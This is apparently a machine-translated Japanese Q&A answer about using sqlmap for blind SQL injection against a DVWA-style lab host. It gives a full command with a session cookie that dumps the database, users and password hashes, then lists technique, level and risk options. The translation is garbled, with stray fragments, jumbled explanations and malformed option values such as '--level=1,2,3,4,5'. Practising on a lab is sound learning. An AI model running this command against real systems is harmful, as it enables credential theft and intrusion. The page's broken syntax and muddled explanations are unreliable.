2017-08-02 1 views

答えて

3

私はSQLの時間ベースのブラインドのためのクッキーを持っているべきだと思います。例えば

sqlmap -u 'http://192.168.85.129/vulnerabilities/sqli_blind/?id=&Submit=Submit' --cookie="PHPSESSID=1k37fvfqn08c82ua7qrgvp3su4; security=low" --dump --users --passwords

をtihsまたはこれは--technique = BEUSTQするためのものです。

--banner --technique=BEUSTQ --level=1,2,3,4,5 

GETおよびPOSTパラメータは常に、テストされたHTTP Cookieヘッダの値はレベル3デフォルト値のために無害である1 --risk=1,2,3,4からテストされるレベル2のHTTPのUser-Agent /リファラーヘッダー値から試験します大部分のSQLインジェクションポイント。リスク値2は、重大なクエリ時間ベースのSQLインジェクションのテストをデフォルトレベルに追加し、値3はORベースのSQLインジェクションテストも追加します。 --second-order=visible_page_url Injection

関連する問題